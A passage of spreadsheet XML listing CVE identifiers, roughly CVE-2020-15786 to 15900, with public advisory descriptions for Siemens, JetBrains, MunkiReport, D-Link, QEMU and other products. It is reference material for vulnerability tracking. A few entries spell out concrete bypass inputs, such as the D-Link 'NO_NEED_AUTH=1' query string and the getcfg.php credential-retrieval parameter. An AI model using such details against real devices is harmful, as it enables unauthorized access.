    <t>A vulnerability has been identified in Siveillance Video Client (All versions). In environments where Windows NTLM authentication is enabled the affected client application transmits usernames to the server in cleartext. This could allow an attacker in a privileged network position to obtain valid adminstrator login names and use this information to launch further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-15786</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC HMI Basic Panels 2nd Generation (incl. SIPLUS variants) (All versions &lt; V16), SIMATIC HMI Comfort Panels (incl. SIPLUS variants) (All versions &lt;= V16), SIMATIC HMI Mobile Panels (All versions &lt;= V16), SIMATIC HMI Unified Comfort Panels (All versions &lt;= V16). Affected devices insufficiently block excessive authentication attempts. This could allow a remote attacker to discover user passwords and obtain access to the Sm@rt Server via a brute-force attack.</t>
  </si>
  <si>
    <t>CVE-2020-15787</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC HMI Unified Comfort Panels (All versions &lt;= V16). Affected devices insufficiently validate authentication attempts as the information given can be truncated to match only a set number of characters versus the whole provided string. This could allow a remote attacker to discover user passwords and obtain access to the Sm@rt Server via a brute-force attack.</t>
  </si>
  <si>
    <t>CVE-2020-15788</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Polarion Subversion Webclient (All versions). The Polarion subversion web application does not filter user input in a way that prevents Cross-Site Scripting. If a user is enticed into passing specially crafted, malicious input to the web client (e.g. by clicking on a malicious URL with embedded JavaScript), then JavaScript code can be returned and may then be executed by the user’s client. Various actions could be triggered by running malicious JavaScript code.</t>
  </si>
  <si>
    <t>CVE-2020-15789</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Polarion Subversion Webclient (All versions). The web interface could allow a Cross-Site Request Forgery (CSRF) attack if an unsuspecting user is tricked into accessing a malicious link. Successful exploitation requires user interaction by a legitimate user, who must be authenticated to the web interface. A successful attack could allow an attacker to trigger actions via the web interface that the legitimate user is allowed to perform. This could allow the attacker to read or modify contents of the web application.</t>
  </si>
  <si>
    <t>CVE-2020-1579</t>
  </si>
  <si>
    <t>CVE-2020-15790</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Spectrum Power 4 (All versions &lt; V4.70 SP8). If configured in an insecure manner, the web server might be susceptible to a directory listing attack.</t>
  </si>
  <si>
    <t>CVE-2020-15791</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC S7-300 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions), SIMATIC S7-400 CPU family (incl. SIPLUS variants) (All versions), SIMATIC WinAC RTX (F) 2010 (All versions), SINUMERIK 840D sl (All versions). The authentication protocol between a client and a PLC via port 102/tcp (ISO-TSAP) insufficiently protects the transmitted password. This could allow an attacker that is able to intercept the network traffic to obtain valid PLC credentials.</t>
  </si>
  <si>
    <t>CVE-2020-15792</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Desigo Insight (All versions). The web service does not properly apply input validation for some query parameters in a reserved area. This could allow an authenticated attacker to retrieve data via a content-based blind SQL injection attack.</t>
  </si>
  <si>
    <t>CVE-2020-15793</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Desigo Insight (All versions). The device does not properly set the X-Frame-Options HTTP Header which makes it vulnerable to Clickjacking attacks. This could allow an unauthenticated attacker to retrieve or modify data in the context of a legitimate user by tricking that user to click on a website controlled by the attacker.</t>
  </si>
  <si>
    <t>CVE-2020-15794</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Desigo Insight (All versions). Some error messages in the web application show the absolute path to the requested resource. This could allow an authenticated attacker to retrieve additional information about the host system.</t>
  </si>
  <si>
    <t>CVE-2020-15795</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Nucleus NET (All versions &lt; V5.2), Nucleus Source Code (Versions including affected DNS modules). The DNS domain name label parsing functionality does not properly validate the names in DNS-responses. The parsing of malformed responses could result in a write past the end of an allocated structure. An attacker with a privileged position in the network could leverage this vulnerability to execute code in the context of the current process or cause a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2020-15796</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC ET 200SP Open Controller (incl. SIPLUS variants) (V20.8), SIMATIC S7-1500 Software Controller (V20.8). The web server of the affected products contains a vulnerability that could allow a remote attacker to trigger a denial-of-service condition by sending a specially crafted HTTP request.</t>
  </si>
  <si>
    <t>CVE-2020-15797</t>
  </si>
  <si>
    <t>A vulnerability has been identified in DCA Vantage Analyzer (All versions &lt; V4.5 are affected by CVE-2020-7590. In addition, serial numbers &lt; 40000 running software V4.4.0 are also affected by CVE-2020-15797). Improper Access Control could allow an unauthenticated attacker to escape from the restricted environment (“kiosk mode”) and access the underlying operating system. Successful exploitation requires direct physical access to the system.</t>
  </si>
  <si>
    <t>CVE-2020-15798</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC HMI Comfort Panels (incl. SIPLUS variants) (All versions &lt; V16 Update 3a), SIMATIC HMI KTP Mobile Panels (All versions &lt; V16 Update 3a), SINAMICS GH150 (All versions), SINAMICS GL150 (with option X30) (All versions), SINAMICS GM150 (with option X30) (All versions), SINAMICS SH150 (All versions), SINAMICS SL150 (All versions), SINAMICS SM120 (All versions), SINAMICS SM150 (All versions), SINAMICS SM150i (All versions). Affected devices with enabled telnet service do not require authentication for this service. This could allow a remote attacker to gain full access to the device. (ZDI-CAN-12046)</t>
  </si>
  <si>
    <t>CVE-2020-15799</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SCALANCE X-200 switch family (incl. SIPLUS NET variants) (All versions &lt; V5.2.5), SCALANCE X-200IRT switch family (incl. SIPLUS NET variants) (All versions &lt; V5.5.0). The vulnerability could allow an unauthenticated attacker to reboot the device over the network by using special urls from integrated web server of the affected products.</t>
  </si>
  <si>
    <t>CVE-2020-1580</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1573.</t>
  </si>
  <si>
    <t>CVE-2020-15800</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SCALANCE X-200 switch family (incl. SIPLUS NET variants) (All versions &lt; V5.2.5), SCALANCE X-200IRT switch family (incl. SIPLUS NET variants) (All versions &lt; V5.5.0), SCALANCE X-300 switch family (incl. X408 and SIPLUS NET variants) (All versions &lt; V4.1.0). The webserver of the affected devices contains a vulnerability that may lead to a heap overflow condition. An attacker could cause this condition on the webserver by sending specially crafted requests. This could stop the webserver temporarily.</t>
  </si>
  <si>
    <t>CVE-2020-15801</t>
  </si>
  <si>
    <t>In Python 3.8.4, sys.path restrictions specified in a python38._pth file are ignored, allowing code to be loaded from arbitrary locations. The &lt;executable-name&gt;._pth file (e.g., the python._pth file) is not affected.</t>
  </si>
  <si>
    <t>CVE-2020-15802</t>
  </si>
  <si>
    <t>Devices supporting Bluetooth before 5.1 may allow man-in-the-middle attacks, aka BLURtooth. Cross Transport Key Derivation in Bluetooth Core Specification v4.2 and v5.0 may permit an unauthenticated user to establish a bonding with one transport, either LE or BR/EDR, and replace a bonding already established on the opposing transport, BR/EDR or LE, potentially overwriting an authenticated key with an unauthenticated key, or a key with greater entropy with one with less.</t>
  </si>
  <si>
    <t>CVE-2020-15803</t>
  </si>
  <si>
    <t>Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1 allows stored XSS in the URL Widget.</t>
  </si>
  <si>
    <t>CVE-2020-15806</t>
  </si>
  <si>
    <t>CODESYS Control runtime system before 3.5.16.10 allows Uncontrolled Memory Allocation.</t>
  </si>
  <si>
    <t>CVE-2020-15807</t>
  </si>
  <si>
    <t>GNU LibreDWG before 0.11 allows NULL pointer dereferences via crafted input files.</t>
  </si>
  <si>
    <t>CVE-2020-15809</t>
  </si>
  <si>
    <t>spxmanage on certain SpinetiX devices allows requests that access unintended resources because of SSRF and Path Traversal. This affects HMP350, HMP300, and DiVA through 4.5.2-1.0.36229; HMP400 and HMP400W through 4.5.2-1.0.2-1eb2ffbd; and DSOS through 4.5.2-1.0.2-1eb2ffbd.</t>
  </si>
  <si>
    <t>CVE-2020-1581</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) components handle objects in memory, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15810</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 4.13 and 5.x before 5.0.4. Due to incorrect data validation, HTTP Request Smuggling attacks may succeed against HTTP and HTTPS traffic. This leads to cache poisoning. This allows any client, including browser scripts, to bypass local security and poison the proxy cache and any downstream caches with content from an arbitrary source. When configured for relaxed header parsing (the default), Squid relays headers containing whitespace characters to upstream servers. When this occurs as a prefix to a Content-Length header, the frame length specified will be ignored by Squid (allowing for a conflicting length to be used from another Content-Length header) but relayed upstream.</t>
  </si>
  <si>
    <t>CVE-2020-15811</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 4.13 and 5.x before 5.0.4. Due to incorrect data validation, HTTP Request Splitting attacks may succeed against HTTP and HTTPS traffic. This leads to cache poisoning. This allows any client, including browser scripts, to bypass local security and poison the browser cache and any downstream caches with content from an arbitrary source. Squid uses a string search instead of parsing the Transfer-Encoding header to find chunked encoding. This allows an attacker to hide a second request inside Transfer-Encoding: it is interpreted by Squid as chunked and split out into a second request delivered upstream. Squid will then deliver two distinct responses to the client, corrupting any downstream caches.</t>
  </si>
  <si>
    <t>CVE-2020-15813</t>
  </si>
  <si>
    <t>Graylog before 3.3.3 lacks SSL Certificate Validation for LDAP servers. It allows use of an external user/group database stored in LDAP. The connection configuration allows the usage of unencrypted, SSL- or TLS-secured connections. Unfortunately, the Graylog client code (in all versions that support LDAP) does not implement proper certificate validation (regardless of whether the "Allow self-signed certificates" option is used). Therefore, any attacker with the ability to intercept network traffic between a Graylog server and an LDAP server is able to redirect traffic to a different LDAP server (unnoticed by the Graylog server due to the lack of certificate validation), effectively bypassing Graylog's authentication mechanism.</t>
  </si>
  <si>
    <t>CVE-2020-15816</t>
  </si>
  <si>
    <t>In Western Digital WD Discovery before 4.0.251.0, a malicious application running with standard user permissions could potentially execute code in the application's process through library injection by using DYLD environment variables.</t>
  </si>
  <si>
    <t>CVE-2020-15817</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2020.1.1331, an external user could execute commands against arbitrary issues.</t>
  </si>
  <si>
    <t>CVE-2020-15818</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2020.2.8527, the subtasks workflow could disclose issue existence.</t>
  </si>
  <si>
    <t>CVE-2020-15819</t>
  </si>
  <si>
    <t>JetBrains YouTrack before 2020.2.10643 was vulnerable to SSRF that allowed scanning internal ports.</t>
  </si>
  <si>
    <t>CVE-2020-1582</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Access software when the software fails to properly handle objects in memory, aka 'Microsoft Access Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15820</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2020.2.6881, the markdown parser could disclose hidden file existence.</t>
  </si>
  <si>
    <t>CVE-2020-15821</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2020.2.6881, a user without permission is able to create an article draft.</t>
  </si>
  <si>
    <t>CVE-2020-15822</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2020.2.10514, SSRF is possible because URL filtering can be escaped.</t>
  </si>
  <si>
    <t>CVE-2020-15823</t>
  </si>
  <si>
    <t>JetBrains YouTrack before 2020.2.8873 is vulnerable to SSRF in the Workflow component.</t>
  </si>
  <si>
    <t>CVE-2020-15824</t>
  </si>
  <si>
    <t>In JetBrains Kotlin from 1.4-M1 to 1.4-RC (as Kotlin 1.3.7x is not affected by the issue. Fixed version is 1.4.0) there is a script-cache privilege escalation vulnerability due to kotlin-main-kts cached scripts in the system temp directory, which is shared by all users by default.</t>
  </si>
  <si>
    <t>CVE-2020-15825</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.1, users with the Modify Group permission can elevate other users' privileges.</t>
  </si>
  <si>
    <t>CVE-2020-15826</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.1, users are able to assign more permissions than they have.</t>
  </si>
  <si>
    <t>CVE-2020-15827</t>
  </si>
  <si>
    <t>In JetBrains ToolBox version 1.17 before 1.17.6856, the set of signature verifications omitted the jetbrains-toolbox.exe file.</t>
  </si>
  <si>
    <t>CVE-2020-15828</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.1.1, project parameter values can be retrieved by a user without appropriate permissions.</t>
  </si>
  <si>
    <t>CVE-2020-15829</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2019.2.3, password parameters could be disclosed via build logs.</t>
  </si>
  <si>
    <t>CVE-2020-1583</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft Word improperly discloses the contents of its memory, aka 'Microsoft Word Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1502, CVE-2020-1503.</t>
  </si>
  <si>
    <t>CVE-2020-15830</t>
  </si>
  <si>
    <t>JetBrains TeamCity before 2019.2.3 is vulnerable to stored XSS in the administration UI.</t>
  </si>
  <si>
    <t>CVE-2020-15831</t>
  </si>
  <si>
    <t>JetBrains TeamCity before 2019.2.3 is vulnerable to reflected XSS in the administration UI.</t>
  </si>
  <si>
    <t>CVE-2020-15832</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 4.1.5-std devices. The poof.cgi script contains undocumented code that provides the ability to remotely reboot the device. An adversary with the private key (but not the root password) can remotely reboot the device.</t>
  </si>
  <si>
    <t>CVE-2020-15833</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 4.1.5-std devices. The Dropbear SSH daemon has been modified to accept an alternate hard-coded path to a public key that allows root access. This key is stored in a /rom location that cannot be modified by the device owner.</t>
  </si>
  <si>
    <t>CVE-2020-15834</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 4.1.5-std devices. The wireless network password is exposed in a QR encoded picture that an unauthenticated adversary can download via the web-management interface.</t>
  </si>
  <si>
    <t>CVE-2020-15835</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 4.1.5-std devices. The authentication function contains undocumented code that provides the ability to authenticate as root without knowing the actual root password. An adversary with the private key can remotely authenticate to the management interface as root.</t>
  </si>
  <si>
    <t>CVE-2020-15836</t>
  </si>
  <si>
    <t>An issue was discovered on Mofi Network MOFI4500-4GXeLTE 4.1.5-std devices. The authentication function passes untrusted data to the operating system without proper sanitization. A crafted request can be sent to execute arbitrary commands as root.</t>
  </si>
  <si>
    <t>CVE-2020-15838</t>
  </si>
  <si>
    <t>The Agent Update System in ConnectWise Automate before 2020.8 allows Privilege Escalation because the _LTUPDATE folder has weak permissions.</t>
  </si>
  <si>
    <t>CVE-2020-15839</t>
  </si>
  <si>
    <t>Liferay Portal before 7.3.3, and Liferay DXP 7.1 before fix pack 18 and 7.2 before fix pack 6, does not restrict the size of a multipart/form-data POST action, which allows remote authenticated users to conduct denial-of-service attacks by uploading large files.</t>
  </si>
  <si>
    <t>CVE-2020-1584</t>
  </si>
  <si>
    <t>CVE-2020-15840</t>
  </si>
  <si>
    <t>In Liferay Portal before 7.3.1, Liferay Portal 6.2 EE, and Liferay DXP 7.2, DXP 7.1 and DXP 7.0, the property 'portlet.resource.id.banned.paths.regexp' can be bypassed with doubled encoded URLs.</t>
  </si>
  <si>
    <t>CVE-2020-15841</t>
  </si>
  <si>
    <t>Liferay Portal before 7.3.0, and Liferay DXP 7.0 before fix pack 89, 7.1 before fix pack 17, and 7.2 before fix pack 4, does not safely test a connection to a LDAP server, which allows remote attackers to obtain the LDAP server's password via the Test LDAP Connection feature.</t>
  </si>
  <si>
    <t>CVE-2020-15842</t>
  </si>
  <si>
    <t>Liferay Portal before 7.3.0, and Liferay DXP 7.0 before fix pack 90, 7.1 before fix pack 17, and 7.2 before fix pack 5, allows man-in-the-middle attackers to execute arbitrary code via crafted serialized payloads, because of insecure deserialization.</t>
  </si>
  <si>
    <t>CVE-2020-15843</t>
  </si>
  <si>
    <t>ActFax Version 7.10 Build 0335 (2020-05-25) is susceptible to a privilege escalation vulnerability due to insecure folder permissions on %PROGRAMFILES%\ActiveFax\Client\, %PROGRAMFILES%\ActiveFax\Install\ and %PROGRAMFILES%\ActiveFax\Terminal\. The folder permissions allow "Full Control" to "Everyone". An authenticated local attacker can exploit this to replace the TSClientB.exe binary in the Terminal directory, which is executed on logon for every user. Alternatively, the attacker can replace any of the binaries in the Client or Install directories. The latter requires additional user interaction, for example starting the client.</t>
  </si>
  <si>
    <t>CVE-2020-15849</t>
  </si>
  <si>
    <t>Re:Desk 2.3 has a blind authenticated SQL injection vulnerability in the SettingsController class, in the actionEmailTemplates() method. A malicious actor with access to an administrative account could abuse this vulnerability to recover sensitive data from the application's database, allowing for authorization bypass and taking over additional accounts by means of modifying password-reset tokens stored in the database. Remote command execution is also possible by leveraging this to abuse the Yii framework's bizRule functionality, allowing for arbitrary PHP code to be executed by the application. Remote command execution is also possible by using this together with a separate insecure file upload vulnerability (CVE-2020-15488).</t>
  </si>
  <si>
    <t>CVE-2020-1585</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1560, CVE-2020-1574.</t>
  </si>
  <si>
    <t>CVE-2020-15850</t>
  </si>
  <si>
    <t>Insecure permissions in Nakivo Backup &amp; Replication Director version 9.4.0.r43656 on Linux allow local users to access the Nakivo Director web interface and gain root privileges. This occurs because the database containing the users of the web application and the password-recovery secret value is readable.</t>
  </si>
  <si>
    <t>CVE-2020-15851</t>
  </si>
  <si>
    <t>Lack of access control in Nakivo Backup &amp; Replication Transporter version 9.4.0.r43656 allows remote users to access unencrypted backup repositories and the Nakivo Controller configuration via a network accessible transporter service. It is also possible to create or delete backup repositories.</t>
  </si>
  <si>
    <t>CVE-2020-15852</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel 5.5 through 5.7.9, as used in Xen through 4.13.x for x86 PV guests. An attacker may be granted the I/O port permissions of an unrelated task. This occurs because tss_invalidate_io_bitmap mishandling causes a loss of synchronization between the I/O bitmaps of TSS and Xen, aka CID-cadfad870154.</t>
  </si>
  <si>
    <t>CVE-2020-15853</t>
  </si>
  <si>
    <t>supybot-fedora implements the command 'refresh', that refreshes the cache of all users from FAS. This takes quite a while to run, and zodbot stops responding to requests during this time.</t>
  </si>
  <si>
    <t>CVE-2020-15855</t>
  </si>
  <si>
    <t>Two cross-site scripting vulnerabilities were fixed in Bodhi 5.6.1.</t>
  </si>
  <si>
    <t>CVE-2020-15858</t>
  </si>
  <si>
    <t>Some devices of Thales DIS (formerly Gemalto, formerly Cinterion) allow Directory Traversal by physically proximate attackers. The directory path access check of the internal flash file system can be circumvented. This flash file system can store application-specific data and data needed for customer Java applications, TLS and OTAP (Java over-the-air-provisioning) functionality. The affected products and releases are: BGS5 up to and including SW RN 02.000 / ARN 01.001.06 EHSx and PDSx up to and including SW RN 04.003 / ARN 01.000.04 ELS61 up to and including SW RN 02.002 / ARN 01.000.04 ELS81 up to and including SW RN 05.002 / ARN 01.000.04 PLS62 up to and including SW RN 02.000 / ARN 01.000.04</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-15859</t>
  </si>
  <si>
    <t>QEMU 4.2.0 has a use-after-free in hw/net/e1000e_core.c because a guest OS user can trigger an e1000e packet with the data's address set to the e1000e's MMIO address.</t>
  </si>
  <si>
    <t>CVE-2020-15860</t>
  </si>
  <si>
    <t>Parallels Remote Application Server (RAS) 17.1.1 has a Business Logic Error causing remote code execution. It allows an authenticated user to execute any application in the backend operating system through the web application, despite the affected application not being published. In addition, it was discovered that it is possible to access any host in the internal domain, even if it has no published applications or the mentioned host is no longer associated with that server farm.</t>
  </si>
  <si>
    <t>CVE-2020-15861</t>
  </si>
  <si>
    <t>Net-SNMP through 5.7.3 allows Escalation of Privileges because of UNIX symbolic link (symlink) following.</t>
  </si>
  <si>
    <t>CVE-2020-15862</t>
  </si>
  <si>
    <t>Net-SNMP through 5.7.3 has Improper Privilege Management because SNMP WRITE access to the EXTEND MIB provides the ability to run arbitrary commands as root.</t>
  </si>
  <si>
    <t>CVE-2020-15863</t>
  </si>
  <si>
    <t>hw/net/xgmac.c in the XGMAC Ethernet controller in QEMU before 07-20-2020 has a buffer overflow. This occurs during packet transmission and affects the highbank and midway emulated machines. A guest user or process could use this flaw to crash the QEMU process on the host, resulting in a denial of service or potential privileged code execution. This was fixed in commit 5519724a13664b43e225ca05351c60b4468e4555.</t>
  </si>
  <si>
    <t>CVE-2020-15864</t>
  </si>
  <si>
    <t>An issue was discovered in Quali CloudShell 9.3. An XSS vulnerability in the login page allows an attacker to craft a URL, with a constructor.constructor substring in the username field, that executes a payload when the user visits the /Account/Login page.</t>
  </si>
  <si>
    <t>CVE-2020-15865</t>
  </si>
  <si>
    <t>A Remote Code Execution vulnerability in Stimulsoft (aka Stimulsoft Reports) 2013.1.1600.0 allows an attacker to encode C# scripts as base-64 in the report XML file so that they will be compiled and executed on the server that processes this file. This can be used to fully compromise the server.</t>
  </si>
  <si>
    <t>CVE-2020-15866</t>
  </si>
  <si>
    <t>mruby through 2.1.2-rc has a heap-based buffer overflow in the mrb_yield_with_class function in vm.c because of incorrect VM stack handling. It can be triggered via the stack_copy function.</t>
  </si>
  <si>
    <t>CVE-2020-15867</t>
  </si>
  <si>
    <t>The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution. There can be a privilege escalation if access to this hook feature is granted to a user who does not have administrative privileges. NOTE: because this is mentioned in the documentation but not in the UI, it could be considered a "Product UI does not Warn User of Unsafe Actions" issue.</t>
  </si>
  <si>
    <t>CVE-2020-15868</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository Manager OSS/Pro before 3.26.0 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-15869</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository Manager OSS/Pro versions before 3.25.1 allow XSS (issue 1 of 2).</t>
  </si>
  <si>
    <t>CVE-2020-1587</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15870</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository Manager OSS/Pro versions before 3.25.1 allow XSS (Issue 2 of 2).</t>
  </si>
  <si>
    <t>CVE-2020-15871</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository Manager OSS/Pro version before 3.25.1 allows Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-15873</t>
  </si>
  <si>
    <t>In LibreNMS before 1.65.1, an authenticated attacker can achieve SQL Injection via the customoid.inc.php device_id POST parameter to ajax_form.php.</t>
  </si>
  <si>
    <t>CVE-2020-15877</t>
  </si>
  <si>
    <t>An issue was discovered in LibreNMS before 1.65.1. It has insufficient access control for normal users because of "'guard' =&gt; 'admin'" instead of "'middleware' =&gt; ['can:admin']" in routes/web.php.</t>
  </si>
  <si>
    <t>CVE-2020-15879</t>
  </si>
  <si>
    <t>Bitwarden Server 1.35.1 allows SSRF because it does not consider certain IPv6 addresses (ones beginning with fc, fd, fe, or ff, and the :: address) and certain IPv4 addresses (0.0.0.0/8, 127.0.0.0/8, and 169.254.0.0/16).</t>
  </si>
  <si>
    <t>CVE-2020-15881</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) vulnerability in the munki_facts (aka Munki Conditions) module before 1.5 for MunkiReport allows remote attackers to inject arbitrary web script or HTML via the key name.</t>
  </si>
  <si>
    <t>CVE-2020-15882</t>
  </si>
  <si>
    <t>A CSRF issue in manager/delete_machine/{id} in MunkiReport before 5.6.3 allows attackers to delete arbitrary machines from the MunkiReport database.</t>
  </si>
  <si>
    <t>CVE-2020-15883</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) vulnerability in the managedinstalls module before 2.6 for MunkiReport allows remote attackers to inject arbitrary web script or HTML via the last two URL parameters (through which installed packages names and versions are reported).</t>
  </si>
  <si>
    <t>CVE-2020-15884</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in TableQuery.php in MunkiReport before 5.6.3 allows attackers to execute arbitrary SQL commands via the order[0][dir] field on POST requests to /datatables/data.</t>
  </si>
  <si>
    <t>CVE-2020-15885</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) vulnerability in the comment module before 4.0 for MunkiReport allows remote attackers to inject arbitrary web script or HTML by posting a new comment.</t>
  </si>
  <si>
    <t>CVE-2020-15886</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in reportdata_controller.php in the reportdata module before 3.5 for MunkiReport allows attackers to execute arbitrary SQL commands via the req parameter of the /module/reportdata/ip endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-15887</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in softwareupdate_controller.php in the Software Update module before 1.6 for MunkiReport allows attackers to execute arbitrary SQL commands via the last URL parameter of the /module/softwareupdate/get_tab_data/ endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-15888</t>
  </si>
  <si>
    <t>Lua through 5.4.0 mishandles the interaction between stack resizes and garbage collection, leading to a heap-based buffer overflow, heap-based buffer over-read, or use-after-free.</t>
  </si>
  <si>
    <t>CVE-2020-15889</t>
  </si>
  <si>
    <t>Lua 5.4.0 has a getobjname heap-based buffer over-read because youngcollection in lgc.c uses markold for an insufficient number of list members.</t>
  </si>
  <si>
    <t>CVE-2020-1589</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1033, CVE-2020-1592, CVE-2020-16854.</t>
  </si>
  <si>
    <t>CVE-2020-15890</t>
  </si>
  <si>
    <t>LuaJit through 2.1.0-beta3 has an out-of-bounds read because __gc handler frame traversal is mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-15892</t>
  </si>
  <si>
    <t>An issue was discovered in apply.cgi on D-Link DAP-1520 devices before 1.10b04Beta02. Whenever a user performs a login action from the web interface, the request values are being forwarded to the ssi binary. On the login page, the web interface restricts the password input field to a fixed length of 15 characters. The problem is that validation is being done on the client side, hence it can be bypassed. When an attacker manages to intercept the login request (POST based) and tampers with the vulnerable parameter (log_pass), to a larger length, the request will be forwarded to the webserver. This results in a stack-based buffer overflow. A few other POST variables, (transferred as part of the login request) are also vulnerable: html_response_page and log_user.</t>
  </si>
  <si>
    <t>CVE-2020-15893</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DIR-816L devices 2.x before 1.10b04Beta02. Universal Plug and Play (UPnP) is enabled by default on port 1900. An attacker can perform command injection by injecting a payload into the Search Target (ST) field of the SSDP M-SEARCH discover packet.</t>
  </si>
  <si>
    <t>CVE-2020-15894</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DIR-816L devices 2.x before 1.10b04Beta02. There exists an exposed administration function in getcfg.php, which can be used to call various services. It can be utilized by an attacker to retrieve various sensitive information, such as admin login credentials, by setting the value of _POST_SERVICES in the query string to DEVICE.ACCOUNT.</t>
  </si>
  <si>
    <t>CVE-2020-15895</t>
  </si>
  <si>
    <t>An XSS issue was discovered on D-Link DIR-816L devices 2.x before 1.10b04Beta02. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter, before it's printed on the webpage.</t>
  </si>
  <si>
    <t>CVE-2020-15896</t>
  </si>
  <si>
    <t>An authentication-bypass issue was discovered on D-Link DAP-1522 devices 1.4x before 1.10b04Beta02. There exist a few pages that are directly accessible by any unauthorized user, e.g., logout.php and login.php. This occurs because of checking the value of NO_NEED_AUTH. If the value of NO_NEED_AUTH is 1, the user has direct access to the webpage without any authentication. By appending a query string NO_NEED_AUTH with the value of 1 to any protected URL, any unauthorized user can access the application directly, as demonstrated by bsc_lan.php?NO_NEED_AUTH=1.</t>
  </si>
  <si>
    <t>CVE-2020-15897</t>
  </si>
  <si>
    <t>Arista EOS before 4.21.12M, 4.22.x before 4.22.7M, 4.23.x before 4.23.5M, and 4.24.x before 4.24.2F allows remote attackers to cause traffic loss or incorrect forwarding of traffic via a malformed link-state PDU to the IS-IS router.</t>
  </si>
  <si>
    <t>CVE-2020-15898</t>
  </si>
  <si>
    <t>In Arista EOS malformed packets can be incorrectly forwarded across VLAN boundaries in one direction. This vulnerability is only susceptible to exploitation by unidirectional traffic (ex. UDP) and not bidirectional traffic (ex. TCP). This affects: EOS 7170 platforms version 4.21.4.1F and below releases in the 4.21.x train; EOS X-Series versions 4.21.11M and below releases in the 4.21.x train; 4.22.6M and below releases in the 4.22.x train; 4.23.4M and below releases in the 4.23.x train; 4.24.2.1F and below releases in the 4.24.x train.</t>
  </si>
  <si>
    <t>CVE-2020-15899</t>
  </si>
  <si>
    <t>Grin 3.0.0 before 4.0.0 has insufficient validation of data related to Mimblewimble.</t>
  </si>
  <si>
    <t>CVE-2020-1590</t>
  </si>
  <si>
    <t>CVE-2020-15900</t>
  </si>
  <si>
